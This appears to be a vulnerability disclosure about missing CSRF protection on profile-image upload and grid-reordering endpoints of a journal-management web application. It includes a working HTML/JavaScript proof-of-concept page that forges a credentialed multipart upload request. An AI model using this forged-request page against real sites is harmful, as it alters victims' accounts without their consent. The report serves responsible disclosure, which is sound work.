Description

No CSRF in upload profile too: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:

/index.php/e/$$$call$$$/grid/settings/submission-checklist/submission-checklist-grid/save-sequence

/index.php/e/$$$call$$$/grid/settings/genre/genre-grid/save-sequence

POC for upload files

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://10.0.2.15:8000/index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking users to change their user profile picture.